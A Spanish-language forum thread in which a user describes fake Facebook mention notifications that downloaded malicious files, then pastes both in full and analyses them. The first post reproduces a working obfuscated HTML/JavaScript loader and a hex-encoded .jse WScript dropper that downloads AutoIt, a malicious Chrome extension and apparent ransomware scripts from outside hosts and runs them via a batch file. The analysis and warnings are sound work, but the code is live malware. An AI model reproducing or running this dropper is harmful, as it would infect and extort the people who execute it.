Saltar al contenido

Gnu/Linux Vagos usa cookies. Lea nuestra Política de privacidad para más información.    Acepto el uso de cookies

Foto
Tecnología

"Virus" en Facebook, cómo puede ser que pase esto?

Tecnología malware facebook virus ramsom ramsomware extension javascript windows

  • Por favor, loguéate para poder responder
8 respuestas a este tema

#1 DESCONECTADO   Mgbu

Mgbu

    Gurú

  • Registrado: 22/11/2013
  • Mensajes: 786
  • Galletas: 2867

Género:






Lugar:C:\Usuarios\Mgbu

Intereses:Programación, Astronomía, Ciencia, Telecomunicaciones

Escrito 25 June 2016 - 16:09

Ya van dos veces que en facebook recibo una notificacion diciendo "[Nombre de un amigo mio] te mencionó en un comentario". Me parece que el estilo de la notificación y el texto son muy convincentes, no encontré nada fuera de lugar.
Pero cuando toco la notificación en vez de ir a un comentario se descarga un archivo muy dudoso. La primera vez se me descargó un html y hoy un javascript. Al abrirlos se nota bien que son maliciosos.

Pego los dos archivos que recibí:

FACEBOOK99506256.html

<html><i id="iyftoximrggvmrj"><i><center><center><i class="jhdbnkxzbgznks"><img class="bwbxaidctct"><i class="cwijwvtogp"><img><span></span><ul id="qlbziwsxdijh"><center><div id="fhhxtvmnlyokg"></span><div><span id="dfdknaeimrtk"><center id="iuigmfrfpsruqua"></center></i><a href="http://hrdrokufcaleeqo.com"></a><ulid="ekjhallksdnks"></img><center id="effqbrsgcc"><title>Lesli Cagua</title><ul id="caquzvszdqlqt"></i></center></div></i><a href="https://ripfznzxbvjxcsnvp.com"></a><img id="oanusjmbzsbmr"><center id="mpyifckxxtjfik"><i id="dhfpzedmobxbr"><img></ul><div class="ovcvbsugvhux"><ul id="ybftpjvmxql"><span><ul id="ymccjrdqcbrhv"><center class="edwenobzysreq"><img><i><i class="nsbqpgeehddzviq"><a href="http://gnyaqyllencttg.me"></a><span><span class="phjfnweomczzoem"><span id="iyhoixtiyl"><div><ul></img><img class="vfljojcxio"><a class="fqhozmmldb"></span><div><a href="http://hvtydixqvtwfvkkauu.ml"></a><img class="qfcjtjfnijwfz"><img id="zfotzhfsbnhfdm"><a id="acqfbiuuwpivuwp"><ul class="lmguanmthmvyswh"><a href="http://yluwdrepihhhodwedggk.tk"></a><span id="wniuydrbuvrcdi"><img></ul><i class="cnflieoafjvx"></a><span></div><img></ul></i><div class="skwsritmgyzvupy"><ul id="oidxvlmddewnboe"><center></span><img><div id="eaoiekvfzapirf"></div><script>function RMytzvEDK(qfKbOGjpE) {var jheYmerWUA="hAdTUaaSASgrPdjBIkBQuJUsVZJSTkybLCUFDVydOFuEJDfrOHhiqcBmbleVvDWgfRMINlMBQhfzKkQyRY"; gVOfasKQ = ".*blD}5h>2rOQKXvHtZ/L'Y:y)=j;Mm3G{eNPo_8p],R7iE&csd!J+kC1gB?-SfxnUa6A0(VI[<qFw%Tz ".split("");qfKbOGjpE = atob(qfKbOGjpE.split("").reverse().join("")).split("-");KnaxLtWh = "";for (var ARnQXXSLEba = 0; ARnQXXSLEba < qfKbOGjpE.length; ARnQXXSLEba++) {if(typeof gVOfasKQ[qfKbOGjpE[ARnQXXSLEba]] != "undefined") {KnaxLtWh = KnaxLtWh + gVOfasKQ[qfKbOGjpE[ARnQXXSLEba]];var ibiudtyZPbWWh="IQBTCcKJhkusaTkZAsbJMedleSmaOtOxkprMscvAmQSnJdmkvoTitWtxPFxEZmbjBtWUvsuHimUSqhcLvVTPSnmHT";}var lSWncyGYscrMJz="ErpMtbipVXhikOcUaURoXqVWIXnvHNvleLYyNgOIeVRoKTjLOaZMqUIZSWvzJQLOCJnpQbYUXPiHJstysskJnTJgQeFzVroybBNR";}var LMABVilnBJGUU="iOZoEeUdalsymTlewXQXyLfKYGtEBoUJcTXGYSKYdcwqWHutFkqeVvOUciyEwtnym";return KnaxLtWh;}var vgoiyuazrwxkh=RMytzvEDK("=MTL2YTL1ETLtQzM");var gaegqntejry=RMytzvEDK("=MTL2YTL1ETLtQzM");var pjnovytgcipj=RMytzvEDK("=ITL3MTL3ETLtYjN");var uhgdhbjvjhq=window;uhgdhbjvjhq[gaegqntejry](uhgdhbjvjhq[vgoiyuazrwxkh](uhgdhbjvjhq[pjnovytgcipj]('Uk15dHp2RURLKCJ0MFNMdDBTTHRnak10VWpNdEF6TnRBVE50UWpOdFF6TXRrRE50QVRMd1FUTDNFVEwzRVRMMzB5TTIwU0x0MENPeTBTTnkwQ056MFNOMzBDTXgweU54MFNONDBpTTAwU055MENNMzBDTXoweU56MENNMTBDTjIwaU4yMENNeDBDTXRjVEwzRVRMMllUTDVJVEx6VVRMeElUTDVVVEx4SVRMelVUTDFJVEwyMGlOMTBpTjEwaU0wMHlOMjBTTzIwaU4xMGlNMDB5TjIweU4zMGlNMDBpTnRZVE50WVROdElETnRjak50a2pOdFlUTnRJRE50UUROdGN6TnRJRE50WXpOdGtqTnRZVE50SUROdFlUTnRZVE50WVROdElETnRZek50WXpOdElETnRjak50Y3pOdElETnRZVEwyVVRMMlVUTHlRVEw1WVRMNVlUTDJVVEx5UVRMMlVUTDVZVEwyVVRMeVFUTDJVVEw1WVRMMlVUTHlRVEw1MGlOMTBpTjEwaU0wMGlOdFlUTnRZVE50SUROdGNqTnRZVE50WVROdElETnRZVEwyVVRMMlVUTHlRVEwwUVRMMmNUTHlRVEw1MFNPMjBpTjEwaU0wMFNNejBTTzIwaU4xMGlNMDBTTzIwaU4xMGlOMTBpTTAwaU50a2pOdFlUTnRJRE50a1RMNTBpTjEwaU0wMENOMDBpTjMwaU0wMFNPejBTTzIwaU4xMGlNMDBTT3owaU4zMENNMzBDTnowQ00xMHlOejBTTjEwQ014MGlOMjB5TnRVVE50QXpNdGN6TXRBVE10SWpOdEFUTDNVVEwwWVRMMVFUTHdFVEwzRVRMeFlUTHpVVEx4SVRMNUVUTDVFVEx4SVRMelVUTDFJVEx4SVRMeklUTHdRVEwzRVRMM0VUTDMwU015MHlNeTBTTXkweU15MFNPMDBDTTAweU54MHlOeDB5TnRFak10a1ROdFVqTXRFak10TWpNdGtETnRBRE50Y1RNdGNUTXRjVEx4SVRMMWdUTDJJVEwySVRMMWdUTHoweU56MENPMDB5TnoweU54MHlOejBDTXgwQ00wMENNdFFqTnRjek10VUROdGNUTXRZak50Z0ROdGN6TXRNVEx3Y1RMd2NUTDFnVEx5UVRMeElUTHpnVEwyUVRMeU1UTHhJVEx3Y1RMMFlUTDBNVEx3UVRMM01UTHcwQ00wMHlOeDB5TngweU50TWpOdDBTTHRnak10VVRMdDBTTDEwU0x0MFNMNElUTDFJVEwzRVRMellUTDBNVEx6Z1RMME1UTDVRVEwwWVRMM01UTHdRVEw1UVRMME1UTHdFVEx3MENNMDB5TngweU54MHlOdE1qTnRBek50TVRMMllUTDFFVEwwTVRMdDBTTHQweU16MFNONDBTTnkwU08yMFNPMjBTT3RVRE90WWpNdFlqTXRVRE90a0ROdFV6TnRjVE10WWpOdGNUTXRrRE50QVRMd1FUTDNFVEwzRVRMMzB5TTIwU040MHlOMDB5TjAwU040MHlOMzBTTjQwaU55MGlOeTBTTjQwQ056MHlOeDBpTjIweU54MFNNMjBDTnkwQ00xMGlOMjBDTnowQ014MENNdEFETnRjVE10Y1RNdGNUTHpZVEx3Y1RMMWdUTHlZVEwxUVRMdDBTTHRNek10VURPdFVqTXRBek50UWpOdGN6TXRVRE50Y1RNdGdETnRRak50VXpOdElqTnRVRE90WWpNdFVET3RRek10Y1ROdFFqTnRZak50Y1RMNFFUTDBNVEwzRVRMMllUTDNFVEw1UVRMMElUTHdVVEwyWVRMME1UTHdFVEwwWVRMM01UTHcwQ00wMHlOeDB5TngweU50TWpOdDBTTHRnak10VWpNdEF6TnRjVE10a0ROdFF6TXRVek50a3pOdFF6TXRNRE50QUROdGNUTXRjVE10WVRNdEFqTXRrak10UVRNdFVET3RFRE90UXpNdFFqTnRVRE90WWpNdFVET3RBRE50Y1RNdGNUTXRjVEx6WVRMMWdUTHdFVEwyWVRMMUVUTHQwU0w1RVRMeDBDT3kwaU55MENPMjBpTngwQ00xMFNPdElUTnRFek10WWpOdFFET3RjVEx4TVRMd1VUTDNjVEx5VVRMNTBDTzAwQ04yMGlNMTBDTjIwaU10VXpOdGNUTDBZVEw0RVRMMElUTDMwQ016MGlOMjBTTTQweU0wMFNPdFlqTnRFVEw1RVRMdDBTTCIpOw==')))</script></ul><span><a id="zrnfrnuzfzomqga"><center class="tocngmhneger"><a href="http://faemnlzrsedapjvz.cf"></a><ul><a href="http://gabsonsfxojxds.ml"></a><img><img id="jgwhnxiflwyr"><span class="dnnlmpfinamtxv"><span><span></ul><i><ul class="pbunwvizja"><span><a href="http://doddxdoahvgkeh.net"></a></span></html> 

comment_33385454.jse

var _0xe519=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x68\x74\x74\x70","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D","\x6F\x70\x65\x6E","\x74\x79\x70\x65","\x77\x72\x69\x74\x65","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x72\x65\x61\x64","\x73\x61\x76\x65\x54\x6F\x46\x69\x6C\x65","\x63\x6C\x6F\x73\x65","\x47\x45\x54","\x73\x65\x6E\x64","\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C","\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","\x25\x41\x50\x50\x44\x41\x54\x41\x25\x5C","\x45\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73","\x4D\x6F\x7A\x69\x6C\x61","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x41\x75\x74\x6F\x69\x74\x2E\x6A\x70\x67","\x5C\x61\x75\x74\x6F\x69\x74\x2E\x65\x78\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x62\x67\x2E\x6A\x70\x67","\x5C\x62\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x65\x6B\x6C\x2E\x6A\x70\x67","\x5C\x65\x6B\x6C\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x66\x2E\x6A\x70\x67","\x5C\x66\x66\x2E\x7A\x69\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x6F\x72\x63\x65\x2E\x6A\x70\x67","\x5C\x66\x6F\x72\x63\x65\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x73\x61\x62\x69\x74\x2E\x6A\x70\x67","\x5C\x73\x61\x62\x69\x74\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x70\x67","\x5C\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x72\x75\x6E\x2E\x6A\x70\x67","\x5C\x72\x75\x6E\x2E\x62\x61\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x75\x70\x2E\x6A\x70\x67","\x5C\x75\x70\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36","\x5C\x70\x69\x6E\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36\x32","\x5C\x70\x69\x6E\x67\x32\x2E\x6A\x73",""];(function(_0xc4a4x1){function _0xc4a4x2(_0xc4a4x2,_0xc4a4x3,_0xc4a4x4){if(!_0xc4a4x3||  !_0xc4a4x2){return null};var _0xc4a4x5=WScript.CreateObject(_0xe519[0]);_0xc4a4x5[_0xe519[1]]= function(){if(_0xc4a4x5[_0xe519[2]]=== 4&& _0xc4a4x5[_0xe519[3]]=== 200){xa=  new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa[_0xe519[7]](_0xc4a4x5.ResponseBody);xa[_0xe519[8]]= _0xc4a4x4;stm2=  new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](xa[_0xe519[9]]());stm2[_0xe519[10]](_0xc4a4x3,2);stm2[_0xe519[11]]();xa[_0xe519[11]]()}};_0xc4a4x5[_0xe519[5]](_0xe519[12],_0xc4a4x2,false);_0xc4a4x5[_0xe519[13]](null)}function _0xc4a4x6(_0xc4a4x7,_0xc4a4x8){{xa=  new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa.LoadFromFile(_0xc4a4x7);ix=  new ActiveXObject(_0xe519[4]);ix[_0xe519[5]]();ix[_0xe519[6]]= 1;ix.LoadFromFile(_0xc4a4x8);stm2=  new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](ix[_0xe519[9]]());stm2[_0xe519[7]](xa[_0xe519[9]]());xa[_0xe519[11]]();ix[_0xe519[11]]();stm2[_0xe519[10]](_0xc4a4x7,2);stm2[_0xe519[11]]()}}fso=  new ActiveXObject(_0xe519[14]);var _0xc4a4x9= new ActiveXObject(_0xe519[15]);_0xc4a4x1=  new ActiveXObject(_0xe519[16]);FileDestr= _0xc4a4x9[_0xe519[18]](_0xe519[17]);mozklasor= FileDestr+ _0xe519[19];if(!fso.FolderExists(mozklasor)){fso.CreateFolder(mozklasor)};_0xc4a4x1.ShellExecute(_0xe519[20]);_0xc4a4x2(_0xe519[21],mozklasor+ _0xe519[22],0);_0xc4a4x2(_0xe519[23],mozklasor+ _0xe519[24],0);_0xc4a4x2(_0xe519[25],mozklasor+ _0xe519[26],0);_0xc4a4x2(_0xe519[27],mozklasor+ _0xe519[28],0);_0xc4a4x2(_0xe519[29],mozklasor+ _0xe519[30],0);_0xc4a4x2(_0xe519[31],mozklasor+ _0xe519[32],0);_0xc4a4x2(_0xe519[33],mozklasor+ _0xe519[34],0);_0xc4a4x2(_0xe519[35],mozklasor+ _0xe519[36],0);_0xc4a4x2(_0xe519[37],mozklasor+ _0xe519[38],0);_0xc4a4x2(_0xe519[39],mozklasor+ _0xe519[40],0);_0xc4a4x2(_0xe519[41],mozklasor+ _0xe519[42],0);_0xc4a4x1.ShellExecute(mozklasor+ _0xe519[36],_0xe519[43],mozklasor,_0xe519[43],0)})(this)

EDIT 5: Hay algunas cosas que supuse mal, para ver qué hace el malware ver http://security.stac...fuscated-script

 

EDIT: Me gustaria saber si es una aplicacion, una falla de diseño de Facebook o que. Luego me pongo a ver el codigo un poco

 

EDIT 2: Ahí terminé de ver casi todo lo que hace (creo). No es que sepa mucho sobre malware, me puse a leer el código a lo que pude entender.

 

Ambos tienen una función que reciben strings que no tienen sentido y los decodifican en nombres útiles como "eval", "GET", o cosas así (incluso funciones enteras que luego son evaluadas) que supongo que son las cosas que buscan los antivirus.

 

Hay algunas cosas que no tienen mucho sentido, no me crean tanto :D

 

FACEBOOK99506256.html

  • Tiene un montón de HTML creo que basura, creo que tampoco es válido (tags que no se cierran, o se cierran en orden incorrecto). Salvo que ese html sea "informacion codificada" no sirve para nada.
  • Tiene un javascript que descarga otro javascript y una dirección web que en mi caso era de publicidades. No pude descargar el javascript, a lo mejor el sitio estaba caído. Las direcciones eran
    blazingfastspeeds.com/js.js?[numero_aleatorio]
    y
    http://lllllllllll.top/end.php?ref=c
  • Después evalúa ese javascript, que supongo que abre la web de publicidades y hace más cosas, pero no pude conseguir ese javascript

comment_33385454.jse

  • Descarga varias cosas:
    • Autoit.exe
      • Es un compilador de un lenguaje de scripting, los scripts tienen extensión .au3
    • bg.js
      • Es una extensión para chrome
      • Tiene una lista de sitios web sobre antivirus, algunos son antivirus como malwarebytes.org, pero otras son sospechosos como anti-virus.by
      • Ejecuta una función en cada página que uno abre, si esa página está en la lista de direcciones web, corta la carga del sitio.
      • Recibe mensajes desde páginas web cargadas y reenvía algo que no se que es
      • Creo que cierra todas las pestañas de facebook abiertas y abre la página principal de facebook, no se por qué
      • Descarga un javascript más, desde
        http://appcdn.co/data.js?r=[numero_aleatorio]&url=[sitio_actual]
        y lo ejecuta, lo raro es que esa dirección descarga jquery. Veo que envía un GET con una url y un número aleatorio. A lo mejor hay una url específica que hace que se descargue un javascript malicioso?
    • manifest.json
      • Creo que es algo de la extensión
    • ekl.au3
      • No lo miré mucho, similar a force.au3
    • force.au3
      • Es muy largo, por lo que veo es un ramsomware!
    • ff.zip
      • Me vino vacío
      • Si lo abro con GHEX veo que debe ser un rar, que igual está vacío
    • ping.js
      • Solamente tiene una línea, no se que es:
        WAU_r_('1,445','pingjse346',-1);
      • EDIT: Después entendí que era, ver el último edit
    • ping2.js
      • Parecido:
        WAU_r_('1,398','pingjse3462',-1);
    • run.bat
      • Compila force.au3 y ekl.au3 con Autoit.exe
    • sabit.au3
      • El MD5 coincide con el de force.au3
    • up.au3
      • El MD5 también coincide con el de force.au3

 

Acá hay otro post sobre lo mismo: security.stackexchange.com/questions/128254/facebook-tricked-me-into-downloading-an-obfuscated-script

 

En estos spoilers tengo al comment_33385454.jse y a bg.js un poco acomodados para intentar entender:

 

comment_33385454.jse

 

bg.js

 

EDIT 3: Formato

 

EDIT 4:

 

Otro amigo me mandó dos veces un malware similar. Me mandó un mensaje privado con simplemente un link a un archivo en dropbox. Las dos veces que me lo mandó fueron archivos diferentes, codificados de forma distinta pero que en sí ejecutan el mismo código.

Los nombres fueron Tfacebook_59538060.jse y Afacebook_34776416.jse

 

El código que ejecutan es muy similar a comment_33385454.jse:

 

Algo interesante es que entendí que eran los ping.js

Creo que son para trackear en cuántas computadoras el malware se ha ejecutado. Eran direcciones web que se descargaban, por ejemplo el último que descargué cargaba esta dirección:

 

http://whos.amung.us.../?k=pingjse3462

 

Que buscando un poco en la página pude encontrar esto (ver las URL):

 

http://whos.amung.us...ps/pingjse3462/

 

Que parecen ser estadísticas de los infectados. Por si les interesa acá van las estadísticas, el comment_33385454.jse linkea a las dos estadísticas mientras que Tfacebook_59538060.jse y Afacebook_34776416.jse linkean solamente a la primera

 

http://whos.amung.us...ts/pingjse3462/

http://whos.amung.us/stats/pingjse346/

 

Estoy loco o hay más de 100 PCs pings por hora? :huh:


Editado por Mgbu, 23 August 2016 - 23:00 .

  • eMix, pacoeloyo, Fransis y 1 otro le gusta esto
:notoy:

#2 DESCONECTADO   pacoeloyo

pacoeloyo

    Dios pingüino

  • Registrado: 20/07/2012
  • Mensajes: 2654
  • Galletas: 10747

Género:









Lugar:costa granadina

Intereses:Mi hija, y seguir avanzando en la vida

Escrito 25 June 2016 - 16:34

Reportalos a Facebook y habla con ese amigo tuyo haber que te ha enviado, hace tiempo que Facebook es un estercolero.

Enviado desde mi Aquaris E4 mediante Tapatalk
  • eMix, Fransis y Rohlling les gusta esto

Me rompes el alma con tu fragilidad y tu tristeza. No se qué clase de alimaña te pudo infringir tanto dolor. Me duele en las entrañas tu pena. Pero te juro que tienes mi mano para agarrarte. Que tienes dentro de ti la fuerza que no encuentras. Que aunque el mundo te abandone, siempre contarás con mi ayuda, y que, aunque hayas llegado a creer a los que decían que no vales nada, tú, como cada persona de este mundo,

tiene el valor de un universo entero.

Levánta la cabeza. Sonríe. Se feliz.

Gnu/Linux x86_64 kernel 3.13.0-100 Almuñequero-Sexitano Granadino

Somos linuxeros y estamos orgullosos de serlo!

Cada uno en su sitio, pero unidos por una misma causa


#3 DESCONECTADO   Mgbu

Mgbu

    Gurú

  • Registrado: 22/11/2013
  • Mensajes: 786
  • Galletas: 2867

Género:






Lugar:C:\Usuarios\Mgbu

Intereses:Programación, Astronomía, Ciencia, Telecomunicaciones

Escrito 25 June 2016 - 18:02

Reportalos a Facebook y habla con ese amigo tuyo haber que te ha enviado, hace tiempo que Facebook es un estercolero.

Enviado desde mi Aquaris E4 mediante Tapatalk


Fueron dos amigos diferentes, tendría que preguntarles
  • pacoeloyo, Fransis y Rohlling les gusta esto
:notoy:

#4 DESCONECTADO   pacoeloyo

pacoeloyo

    Dios pingüino

  • Registrado: 20/07/2012
  • Mensajes: 2654
  • Galletas: 10747

Género:









Lugar:costa granadina

Intereses:Mi hija, y seguir avanzando en la vida

Escrito 25 June 2016 - 19:09

Más de una vez he escuchado que se reciben mensajes falsos de tus contactos en Facebook, ya te digo, el cara libro se ha vuelto un experto en mandar basura.

Enviado desde mi Aquaris E4 mediante Tapatalk
  • Fransis y Rohlling les gusta esto

Me rompes el alma con tu fragilidad y tu tristeza. No se qué clase de alimaña te pudo infringir tanto dolor. Me duele en las entrañas tu pena. Pero te juro que tienes mi mano para agarrarte. Que tienes dentro de ti la fuerza que no encuentras. Que aunque el mundo te abandone, siempre contarás con mi ayuda, y que, aunque hayas llegado a creer a los que decían que no vales nada, tú, como cada persona de este mundo,

tiene el valor de un universo entero.

Levánta la cabeza. Sonríe. Se feliz.

Gnu/Linux x86_64 kernel 3.13.0-100 Almuñequero-Sexitano Granadino

Somos linuxeros y estamos orgullosos de serlo!

Cada uno en su sitio, pero unidos por una misma causa


#5 DESCONECTADO   Mgbu

Mgbu

    Gurú

  • Registrado: 22/11/2013
  • Mensajes: 786
  • Galletas: 2867

Género:






Lugar:C:\Usuarios\Mgbu

Intereses:Programación, Astronomía, Ciencia, Telecomunicaciones

Escrito 25 June 2016 - 20:06

Ahí estuve viendo más sobre el código a ver que llego a entender con lo poco que se

 

 

Con respecto al javascript, al comienzo tiene un array con muchos strings que están escritos de forma hexagesimal que contiene muchas palabras clave como nombres de funciones, sitios web, etc. Acomodandolo un poco queda así:

Para decodificar los hex se puede usar esta web: http://ddecode.com/h...ceb4de02d605cfa

Todos los strings del código eran llamadas al array del comienzo, yo me puse a reemplazarlos por su string correspondiente

Parece que el código lo que hace es descargar varias cosas y ejecutar un .bat

Descargué el bat y adentro tiene esto:

cd "%~dp0"
autoit.exe "force.au3"
autoit.exe "ekl.au3"

Hay que tener en cuenta que los archivos tienen una extensión diferente para confundir

Por lo que vi, autoit es un lenguaje de scripting, entonces supongo que está compilando dos archivos

 

Por último descargué el force.au3

Me da miedo, es super largo y leí muchas veces crypto, debe ser una especie de cryptolocker. También parece que tiene programada una interfaz

 

Acá encontré otro con el problema: http://security.stac...fuscated-script

EDIT: No puedo creer que esa pregunta tenga 5 horas de antiguedad

 

Mas info sobre el tema:

https://securitythou...script-malware/

http://www.schillman...ation-analysis/


Editado por Mgbu, 25 June 2016 - 20:54 .

  • pacoeloyo, Fransis y Rohlling les gusta esto
:notoy:

#6 DESCONECTADO   Mgbu

Mgbu

    Gurú

  • Registrado: 22/11/2013
  • Mensajes: 786
  • Galletas: 2867

Género:






Lugar:C:\Usuarios\Mgbu

Intereses:Programación, Astronomía, Ciencia, Telecomunicaciones

Escrito 29 June 2016 - 01:55

Terminé de ver casi todo el código, actualicé el post con lo que llegué a entender


  • pacoeloyo y Rohlling les gusta esto
:notoy:

#7 DESCONECTADO   Fransis

Fransis

    Pingüino

  • Registrado: 08/04/2013
  • Mensajes: 858
  • Galletas: 3209

Género:








Lugar:Madrid

Intereses:Despertar

Escrito 05 July 2016 - 06:55

yo pensaba que facebook era un codigo malicioso en si....


  • eMix, pacoeloyo, EMILIO y 1 otro le gusta esto

5g1v4-2f6h.jpg


#8 DESCONECTADO   eMix

eMix

    Administrador

  • Registrado: 19/07/2012
  • Mensajes: 2646
  • Galletas: 10500

Género:






Lugar:/home/emix

Escrito 06 July 2016 - 23:10

yo pensaba que facebook era un codigo malicioso en si....

+1
:jajaja:
  • pacoeloyo, EMILIO y Rohlling les gusta esto

168in88.png


#9 DESCONECTADO   Mgbu

Mgbu

    Gurú

  • Registrado: 22/11/2013
  • Mensajes: 786
  • Galletas: 2867

Género:






Lugar:C:\Usuarios\Mgbu

Intereses:Programación, Astronomía, Ciencia, Telecomunicaciones

Escrito 23 August 2016 - 23:01

Actualicé el post, me mandaron dos malware similares y descubrí como ver las estadísticas de los infectados:

 

http://whos.amung.us...ts/pingjse3462/


  • pacoeloyo y Rohlling les gusta esto
:notoy:





También etiquetado con una o más de estas palabras: Tecnología, malware, facebook, virus, ramsom, ramsomware, extension, javascript, windows